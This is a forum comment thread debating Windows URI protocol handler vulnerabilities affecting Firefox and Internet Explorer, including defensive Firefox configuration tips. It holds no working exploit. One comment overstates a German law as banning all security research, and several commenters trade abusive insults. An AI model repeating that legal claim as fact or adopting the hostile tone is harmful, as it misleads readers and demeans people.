This is just an expansion (or rehash) of the exploit using custom "protocol" prefixes (the http:/// part). Now I must be on different intertubes than the rest of y'all, because I hardly ever (read: never) see anything but http, ftp and mailto in the links I use, and I build both public (as in gimmicky) web sites and business apps for a living. Anything else should be handled by a browser PLUGIN, not some creaky registry hack that can spawn any random process. The difference should be obvious: you can have a thousand executables on a PC, but probably less than a dozen browser plugins, making it a lot easier to spot suspicious bits.

Why do we need so many bizarre launchers anyway ? Do people really click funky URIs in IE7 to launch the copy of Firefox that's already installed on their system ? How about a desktop icon, you stupid shits!

A microsoft education for end users

[bl8n8r]

> Microsoft is working to educate users and developers about these security issues

Yep. We know all about Microsoft's education*:

In no event shall microsoft or its suppliers be liable for any special, incidental, punitive, indirect, or consequential damages whatsoever (including, but not limited to, damages for loss of profits or confidential or other information, for business interruption, for personal injury, for loss of privacy, for failure to meet any duty including of good faith or of reasonable care, for negligence, and for any other pecuniary or other loss whatsoever)

[*] - http://www.microsoft.com/windowsxp/home/eula.mspx

Re:A microsoft education for end users

[BSDetector]

Hey smartie! - why didn't you also portions of a similar Apple EULA

Limitation of Liability. To the extent not prohibited by law, in no event shall apple be liable for personal injury, or any incidental, special, indirect or consequential damages whatsoever, including, without limitation, damages for loss of profits, loss of data, business interruption or any other commercial damages or losses, arising out of or related to your use or inability to use the apple software, however caused, regardless of the theory of liability (contract, tort or otherwise) and even if apple has been advised of the possibility of such damages. Some jurisdictions do not allow the limitation of liability for personal injury, or of incidental or consequential damages, so this limitation may not apply to you. In no event shall Apple's total liability to you for all damages (other than as may be required by applicable law in cases involving personal injury) exceed the amount of fifty dollars ($50.00). The foregoing limitations will apply even if the above stated remedy fails of its essential purpose.

I would have posted it as is but the original posting was full of CAPS and /. aborted the post using its "Lameness" filter (Reason: Don't use so many caps. It's like YELLING.). I guess that Apple is lame then. Go ahead - mod me down!

Print Friendly Version

print friendly version for those who prefer to read TFA that way.

Damn!

[rdrd]

I just pressed on that "slashdot://it.slashdot.org" link !!!

202c

[unforkable]

Thus some regular expressions are verboten in Guermany !

Care to provide details?

[brunes69]

Is your "working example" remotely installable?

I am anxious to see how these guys plan to remotely install a URI handler into the registry without any user intervention, unless they are using some other remote exploit, in which case THAT is the actual bug.

Re:Care to provide details?

For those living under a rock: Many applications, including Firefox, install URI handlers by default. Many applications, including Firefox, have no or insufficient safeguards against dangerous URIs which are passed to them that way. Many applications, which render arbitrary remote data, can activate URI handlers with arbitrary URIs, often with no or trivial user interaction. If you think that is fine, you shouldn't dispense security advice.

Re:Care to provide details?

[Alphager]

The thing is: URIs are handled by the OS (in this case : Windows). It does not matter if you use Firefox, Internet Explorer, Word or OpenOffice: They all use the system's URI-handler.

Re:Care to provide details?

So Windows offers a facility for registering and calling URI handlers. That doesn't mean that applications should accept any strange URI through that facility, or use that facility at all. If you accept dangerous URIs, you can't accept them from anywhere. If you accept URIs from everywhere, you have to make sure they're not dangerous. It's hard to get that right, which makes the whole URI handler concept dangerous.

Re:Care to provide details?

[IBBoard]

It doesn't seem to need to be remotely installable. Reading the article (!) mentions that there's a developer's piece of software that's apparently vulnerable to sending out data via this method. That means it can be any badly designed software like AIM or Skype or anything else that could potentially legitimately register itself as a protocol handler that could be the target of this.

Granted, that means that exploits using it wouldn't work on people without that specific app installed or with the protocol handling removed, but then isn't it the same with spam and current exploits? Sending the spam/virus to everyone or probing as many computers as possible doesn't rely on it working for everyone, just on it working for some people and that those "some people" are sufficiently numerous.

Re:Care to provide details?

[Opportunist]

Basically what it does is to make an assumption that a certain application exists on your system. An application that's exploitable through the use of malformed links, or malformed data hitting the application when you follow that link. Certainly, you are perfectly safe if you do not happen to have this application installed.

Re:Care to provide details?

Try running this telnet://.doc
Word is launched....

Re:Care to provide details?

Uhmmm, no

actually that launches telnet... unlike you I tested the link before posting.

smooches! ;)

It's called a URI

[brunes69]

It's part of the protocol. Any link on any web page should be able to specify ANY protocol.

Is anyone complaining that Konqeuror can handle links like sftp://root@someftpsite ?

The whole article is stupid. It is going to come out that this is not remotely exploitable unless you use another remote exploit to install the 3rd party protocol handler.

Non story.

Re:Here it is

[SolitaryMan]

This is the clear indication of problem being a Windows only:

...Thor Larholm showed how a browser could be tricked into sending malformed data to Firefox.

Guess what is this mysterious "browser" thing.

Re:Microsoft do it again

"You idiots have such double standards and it's starting to make me sick."

Patient: Doctor, doctor! It hurts when I raise my arm.
Doctor: Then don't raise your arm.

Nice to have features

[realmike]

Development of great software must include a process to review and cut down on feature on each release. Otherwise it becomes a feature bloat and becomes ugly and dangerous.

Mike | Optimalprint

Re:Microsoft do it again

Don't forget Mac and Linux. The ability to register a custom protocol handler to launch programs in the OS is standard. The ability to reference said protocol handler in a hyperlink is also standard. These problems effect every (major) OS.

MacOSX has had a number of vulnerabilities due to URI handling:

Daring Fireball - Using the 'telnet' URI Protocol to Delete Files
Mac OS X Volume URI Handler Registration Code Execution Vulnerability
Apple Mac OS X SSH URI Handler Remote Code Execution Vulnerability

As long as you can get a browser to pass arbitrary data to an application you will be vulnerable. What needs to happen is that the custom protocol handlers should be white-listed by default requiring the user to explicitly allow a new protocol handler. Any protocol handler not handled directly by the browser should display a dialog to inform the user of the action and permit them to cancel it. The user needs to be aware that they're not clicking on a "normal" hyperlink.

Ultimately I think the only way to really mitigate these kinds of security problems is to sandbox or virtualize the browser, which is actually what MS has done with IE7 in Vista. Vulnerabilities are inevitable so the OS and browser should do what it can to limit the extent of the damage that can be caused.

Anti-MS Zealotry betrays us all

Remember all those people who whine and complain about IE not following their arbitrary standards? Seems like MS doing things right rather than listening to the fools in the standards bodies has protected users of the most stable and most used browser (and now by far the most secure browser).

Standards can be a good thing, but only when you have everyone doing things the right way. All these chumps push is having everyone do things the stupid way... but they are more interested in making MS do what they say than they are in innovation. Or security.

Re:Anti-MS Zealotry betrays us all

[Magic5Ball]

From the article (and not mentioned at all in the summary for some reason):

'These URI issues are complicated, even for software developers. Mozilla Corp. initially thought that Larholm's bug needed Internet Explorer in order to be triggered, but this assessment turned out to be wrong, and two weeks later the Firefox team was forced to patch the same problem. "If an organization like Mozilla is having issues with understanding how a URI handler increases the scope and the attack surface of their applications, think about how hard it is for a small development shop," McFetters said.

Microsoft is working to educate users and developers about these security issues, but there's only so much that it can do, said Mark Griesi, a security program manager with Microsoft.'

It's the Usual M$ Sabotage and FUD.

[twitter]

Important details have been obscured on purpose to FUD Mozilla. I'm surprised they bothered to point out it's Windoze only in the first paragraph, but here's the glaring part of the FUD:

Microsoft is working to educate users and developers about these security issues, but there's only so much that it can do, said Mark Griesi, a security program manager with Microsoft. "Security is an industry responsibility and this is certainly a case of that [principle]," he said. "It's not Microsoft's position to be the gatekeeper of all third-party applications."

Yet, we know that this problem was created by IE7 and does not show up on Mac or gnu/linux. Par for the course, create a problem and then blame the victim. Where have we seen this kind of M$ attack before? All over, and court proved in the anti-trust case and also in the DRDOS case.

Re:It's the Usual M$ Sabotage and FUD.

[Macthorpe]

And yet this problem would be solved if Firefox didn't register a URI at all. Or it actually vetted data that was passed to that URI.

Surprisingly it's not a problem if Firefox isn't installed.

Re:It's the Usual M$ Sabotage and FUD.

[The+Bungi]

twitter, I'm sure anyone who reads Slashdot would be keenly interested in any specific information you have to share about this, so please specify exactly how Microsoft is sabotaging Firefox here.

Oh yeah.

[twitter]

if it ain't broke, don't start shoe-horning new and unsecured protocol-handling into the registry.

Because we all know what a tight machine M$ gave us without help from firefox. Wake me up when this is more than a Windoze problem.

Want to disable it alltogether ?

Goto about:config and

set network.protocol-handler.expose-all to false,
network.protocol-handler.expose.http to true,
network.protocol-handler.expose.javascript to true,
network.protocol-handler.expose.mailto to true and
remove all other network.protocol-handler.expose.*entries (or set them to false).

Set network.protocol-handler.external-default to false,
network.protocol-handler.external.mailto to true and
remove all other network.protocol-handler.external.* entries (of set them to false).

To be sure set network.protocol-handler.warn-external.file to true and
remove all network.protocol-handler.warn-external.* entries (or set them to true).

For more info start at http://kb.mozillazine.org/Network.protocol-handler .expose-all
Beware, on windows things are different. See http://kb.mozillazine.org/Register_protocol

Must be said

[a.d.trick]

Yes, but does it run on Linux :)

Re:Microsoft do it again

[crumley]

What do you consider to be the Linux standard for registering URI schemes in? Mailcap? Facilities specific to KDE or Gnome, like those provided in Konqueoror? Or Firefox's helper application registration?

I don't think Linux is immune to this sort of problem, but it seems like this is one place where the diversity of the desktop on Linux helps quite a bit. I am having a hard time coming up with a realistic way for this to be a problem for a user who runs Windowmaker or FVWM and doesn't install software from really odd sources.

It's not stupid.

[argent]

The problem is that there's no way on Windows or OSX to register a protocol handler for shell programs (Finder, Windows Explorer, the KDE file manager) or applications internal use (help: on both Windows and OSX) without it also being available to the web browsers. This means that any application that isn't designed to deal with untrusted input that the browser developer hasn't yet explicitly blocked is a point of entry.

Exploits using this approach have been found via IE since 1997, and via Safari since 2004.

Re:It's not stupid.

[brunes69]

And in Konqueror since it was written, since it is designed this way.

It is not the web browser's job to validate input into external URI handlers. It is the URI handler's job.

This is ten years old news!

[argent]

I've been talking about this kind of problem in Windows and the HTML control since the late '90s, and in OSX and LaunchServices since 2004. It's worse in Windows, because you have the same stupid lack of security design in ActiveX which is a much harder nut to crack...

http://www.scarydevil.com/~peter/io/apple.html and later posts in http://www.scarydevil.com/~peter/io/ ...

PS...

[argent]

The articles on my site are primarily about Apple, mostly because Microsoft has similar vulnerabilities discovered at far too great a rate for me to keep up. There was a patch for another one (an ActiveX component used by other programs not being explicitly blocked by the HTML control) on Tuesday.

Re:Here it is

[Fred_A]

This is the clear indication of problem being a Windows only:

...Thor Larholm showed how a browser could be tricked into sending malformed data to Firefox.

Guess what is this mysterious "browser" thing.

Are you trying to subtly imply that it isn't Opera ? Why I am shocked ! ;)

MS ducks responsibility again....no surprise.

[CodeShark]

Griesi said that he does not see any of these URI issues as something that needs to be fixed in Windows or Internet Explorer. That's up to the individual software developers whose programs may be misused... "It's not Microsoft's position to be the gatekeeper of all third-party applications."

Except that as far as I can tell, it's the WinXX OS kluges that are allowing the security breaches to access system resources. Correct me if I am wrong but wasn't it a Mr. Bill Gates told the world that security was now the number #1 priority at Microsoft a few years back.

Companies that speak with forked tongues deserve to have said tongue cut off, don't you think?

PPS: the last paragraph is 100% wrong...

[argent]

Griesi said that he does not see any of these URI issues as something that needs to be fixed in Windows or Internet Explorer. That's up to the individual software developers whose programs may be misused. "Security is an industry responsibility and this is certainly a case of that [principle]," he said. "It's not Microsoft's position to be the gatekeeper of all third-party applications."

100% wrong. Microsoft doesn't provide a mechanism for applications to create both secure URI handlers for browsers as well as shell URIs for internal use. If they did, if they had a way to register components (URI handlers, file type handlers, Plugins, ActiveX controls, and so on) for use by shells (eg, Windows Explorer) only, or for use by browsers only, then we would have seen significantly fewer exploits on Windows over the past decade.

This is harder for Microsoft to fix than for Apple to fix, because in Windows the HTML control is the gatekeeper... not the application. Apple hasn't integrated Webcore as far as IE, and since Webcore is based on KHTML it's using the inherently secure IO Slave model rather than leaving it up to the HTML display engine to try and guess what plugins should be allowed.

But it DOES need to be fixed on both platforms.

Re:Microsoft do it again

[MrNaz]

AC: Mod, mod! I have something insightful to say!
Mod: Shut up, post under your name or get lost.

My Nephew has to choose his major soon

[infonography]

He has been in Preschool now for 5 months. Pretty soon they will want him to pick either Arts (Fingerpainting or Crayon), Science (Frogs) or Culinary Arts (Mudpies).

Life is tough for the modern Two Year Old.

Re:My Nephew has to choose his major soon

[szrachen]

Does he need to do that because of this URI Browser exploit? Inquiring minds would like to know.

Er... Wait a minute! Excuse me sir, I believe that you are replying to the wrong story.

Punishment for browser developers

[Animats]

Write 100 times on the whiteboard:

I will not launch applications from the browser.
I will not launch applications from the browser.
I will not launch applications from the browser.
I will not launch applications from the browser.
I will not launch applications from the browser.
I will not launch applications from the browser.

Problem is not Firefox.

[twitter]

M$ Defender, Macthorpe claims what M$ won't directly:

Surprisingly it's not a problem if Firefox isn't installed.

Not even this highly spun article goes that far.

Thor Larholm showed how a browser could be tricked into sending malformed data to Firefox using this technology. This bug allowed an attacker to run unauthorized software on a victim's PC. Later, other researchers, including Rios and McFetters, showed how other browsers and applications could be misused to achieve similar goals.

So IE, mentioned as "a browser", sends the crap to Firefox and will do the trick on it's own. Also, as we have seen before, this was not a problem before IE7.

Re:Problem is not Firefox.

[Macthorpe]

How can IE do the trick without Firefox installed? Why is Firefox accepting bad data via it's URI? Any application could be sending it that data, and it would have still accepted it.

Can you explain how this security problem would exist if Firefox wasn't installed?

Re:Problem is not Firefox.

[twitter]

How can IE do the trick without Firefox installed?

By using the same URI Windows calls Firefox on Windows uses. Those would probably be the ones downgraded by IE7 that created the problem in the first place. This explains why there was no problem before IE7 and the nebulous assertion that other "browsers and applications" have the same problem. Chances are that this is going to balloon out to anything web enabled on Windoze.

Re:Problem is not Firefox.

[Macthorpe]

By using the same URI Windows calls Firefox on Windows uses. Can I have this in English, please? I think you're trying to say that the 'firefox://' URI is a native Windows function, but it's not. Firefox registers it on install.

Those would probably be the ones downgraded by IE7 that created the problem in the first place How can you downgrade a URI? It's a handler. It passes whatever is in it straight to Firefox without being edited, which is why this problem is happening in the first place.

This explains why there was no problem before IE7 and the nebulous assertion that other "browsers and applications" have the same problem. Can you prove they don't? Run some tests for me. The people in the article have and they disagree with you.

Chances are that this is going to balloon out to anything web enabled on Windoze. Like what? Give me an example.

Re:Problem is not Firefox.

[dedazo]

This has nothing to do with IE7. The URI handler functionality is something that has existed since Windows 98. Where do you think KDE got the bright idea for kioslaves? As long as you are responsible enough to check your inputs (which apparently IE6 and 7 and Opera do) then there shouldn't be any problem.

You can stop trying to imply that this is some sort of sabotage by Microsoft, considering they'd be sabotaging themselves in the process. No different to your dumb claim that they "sabotaged" ACPI.

Re:Problem is not Firefox.

Wait, let me get the steps straight here:

1. Internet Explorer is given a URI with the protocol 'firefox://'
2. IE doesn't recognize protocol as one it handles internally
3. IE checks the registry for a protocol handler matching 'firefox://'
4. IE finds Firefox.exe
5. By specification, it is the protocol handler's responsibility to check its own inputs, so IE launches Firefox.exe, with the unchecked URI on the command line, expects Firefox.exe to do its job, and considers the hand-off complete
6. Firefox starts and, due to a flaw in its input check, craps the bed

And somehow this is Microsoft's fault? Because Internet Explorer doesn't make uninformed assumptions about the format of the URIs for somebody else's protocols? Oh, and if Firefox isn't installed, step 4 fails, and IE simply displays a message to inform the user that the firefox:// protocol is unknown. The exploitable code is never run, because the exploitable code isn't installed. But that's still Microsoft's fault, simply because they exist, right?

Microsoft's (and Apple's) responsibility.

[argent]

This is part of what is required when registering a browser on that OS. It's pretty important if you want to set Firefox as the default browser.

IE, this is a "shell" URI that should not be visible to non-trusted content *at all*.

There need to be separate registries for this.

OS X has the same problem, though at least there it doesn't include any equivalent to ActiveX, and the KHTML-based API makes it easier to implement a fix.

http://www.scarydevil.com/~peter/io/apple.html

Re:Microsoft's (and Apple's) responsibility.

[a.d.trick]

How else is firefox supposed to handle protocols liek mailto on a Windows system? The problem is that the URI's shouldn't have been trusted in the first place. The fact that they can execute arbitrary commands is appalling!

The fact that browsers have a protocol attached to them is bad taste, but it's also a red herring. The real problem is that URIs can execute arbitrary commands. Firefox has as much to do with this as a potato has to do with an airliner.

Re:Microsoft's (and Apple's) responsibility.

[argent]

How else is firefox supposed to handle protocols liek mailto on a Windows system?

Using the URI bindings provided for *untrusted* objects. Just like it would use the MIME type bindings for untrusted objects.

The problem is that the URI's shouldn't have been trusted in the first place.

Certainly not the ones that browsers use.

The problem is not limited to URIs. There are also plugins, file-type mappings, MIME-type mappings, and so on. Most of these, no matter what type of binding they are, have nothing to do with browsers. The mistake that Microsoft and Apple made was saying "these types of mappings are used by browsers, and these types aren't". Microsoft draws the line at plugins... browsers can execute any ActiveX plugin in the system, and quite a few more, unless they explicitly exclude them. Apple draws the line at file type mappings for downloaded files... browsers will by default open "safe" files, regardless of what the bindings for them are.

You're just drawing another line along the same axis. The problem is, that's the wrong axis.

Files, binding types (URi vs plugin vs MIME type), URI types, and so on, are not "safe" or "unsafe".

It's the *handlers* that are safe (they either implement a sandbox or do not have mechanisms to do dangerous things) or unsafe (they have the ability to do dangerous things). The syntax (URI, path, COM API, what have you) is an implementation detail... if the application is designed securely and uses the API for that binding type securely... it doesn't matter which way the binding was implemented. If the application isn't designed securely or is sloppy about the binding, you're owned no matter how it gets invoked. There will always be applications you can safely open from the shell to view or operate on files that you must never expose to a browser.

And MOST applications fall into that category.

MOST applications are not sandboxed or secure. Not only is that hard to do for non-trivial apps, but MANY of them can not be, because it's their job to do dangerous things. It's up to the application to register as a shell application (to be used by applications for references that the use or application is in control of), or a browser application (to be used for untrusted objects). When the OS has no way to distinguish between the two, you lose.

Quit whining

[ComSon0]

Here is Billy & Nate's blog
You can look around for the additional information they have.
-h

It already exists: The OffByOne browser

The Off By One Browser does exactly what you ask. Best of all, it caches everything into RAM, so there's no disk fragmentation from cache files, and all traces of browsing are cleared when you close it.

Re:It already exists: The OffByOne browser

Best of all, it caches everything into RAM, so there's no disk fragmentation from cache files, and all traces of browsing are cleared when you close it.

Unfortunately The Off By One Browser isn't open source, and is Windows only.

I suspect that the claim of all traces of browsing being cleared isn't quite accurate either. While it may not directly cache anything to the disk, isn't it possible/likely that browser data will get left behind in the VM Swap file. A recovery utility that scavenges a drive (not looking for any help from directory entries)could likely read things from an unencrypted VM swap file. Even when the host OS provides swap encryption, that only makes it more complicated to read. Particularly with a closed-source OS, it is foolish to assume that someone else doesn't have a method or backdoor that can decode from the swap.

Glitch in slashdot

[infonography]

I was relying to another story, I didn't read this one prior to my post. Very weird.

That's where the new German law is quite handy.

The German government decided that it is unlawful to do any research on security issues. Even university researchers will be prosecuted. Ms. Merkel, the head of our government holds a doctorate in physics. That is what makes German universities valued that much. German Computer Science is a matter of trust and believing in politicians, who truly are the better scientists.

%00 backdoor in Windows OS

[Torodung]

In other words, it's a backdoor in the URI handler for Windows, and Microsoft is "educating" everybody to scrub inputs before passing things off to the backdoored handler.

Great. MS became the "gatekeeper" to all networking security bugs in their OS when they integrated IE into the operating system back in 1997. This is easily fixed by not allowing the URI handler in the OS to behave strangely when given specific inputs (such as %00 and " ).

In short, Microsoft should remove the backdoor. 'Nuff said.

--
Toro

Easy solution?

[porneL]

Opera protects against it by asking each time a new unapproved URI scheme is used. It's not perfect, because it requires user to think, and approved apps may be exploitable as well, but at least it narrows attack surface and gives some warning.

It might be further improved to distinguish between clicked links and automatically triggered opens (like pop-up blocker does).

That's why Sabotage Sucks.

[twitter]

You can stop trying to imply that this is some sort of sabotage by Microsoft, considering they'd be sabotaging themselves in the process. No different to your dumb claim that they "sabotaged" ACPI.

It's nice of you to concede the destructive effects of this kind of competition. I would never argue that it's anything but self defeating for M$ but that does not keep them from doing it again and again.

A company that's been convicted of anti-competitive practices in several lawsuits has earned reasonable suspicion when things break. It was Bill Gate's dumb idea to sabotage ACPI, and that came out in the Iowa Consumer Case. The DRDOS case, (also see p36 here), is a good early example of the overall behavior. They sabotaged a competitor then filled BBSs with astroturf that blamed the victim. Just for you, dedazo, I've made a nice list of more recent sabotages here. The victims include iPod, Firefox, Google Desktop and anti-virus makers and the FUD hate machine is cranked up to full blast in all of those cases.

The big suck of software sabotage is that it always degrades the user experience. The obvious result is that the user loses their choice of software and is forced to use something second rate. Less obvious results are performance hits in what's left. Sabotage demands extra branching and checks that take time and introduce errors of their own. The legacy of this kind of "competition" is complex file formats, insane APIs, and a system that's feature poor, expensive, unreliable and lacks real choices. Even when M$ wins this game without shooting themselves in the foot, they lose.

Re:That's why Sabotage Sucks.

[Macthorpe]

Yet another twitter hate-fest with no facts, no proof, and no relevance whatsoever to the topic. I see you stopped replying to me when I made you look like a moron, which wasn't particularly difficult under the circumstances.

Seeing as I had a nice trio of negative mods all in a line I can see that calling you on your bullshit gives zealots a wakeup call - can't have all those people who know things educating people, can we? What's funny is, people expect that modding me down will shut me up. Fat chance. I earned my karma by being right. You earned yours by towing the populist line. I think that puts me clear in front of you from a moral perspective.

You keep posting this crap, and there'll always be someone like me to tell the truth, don't you worry about that.

Re:That's why Sabotage Sucks.

[dedazo]

It's nice of you to concede

Oops, you started out wrong here, zealot. Let's back up a bit. Don't put letters in my posts, and stop peppering yours with links to useless FUD that has been disproved time and time again. A little less of that petulant hillbilly prose would be nice, too.

Try again, and this time put some effort into it.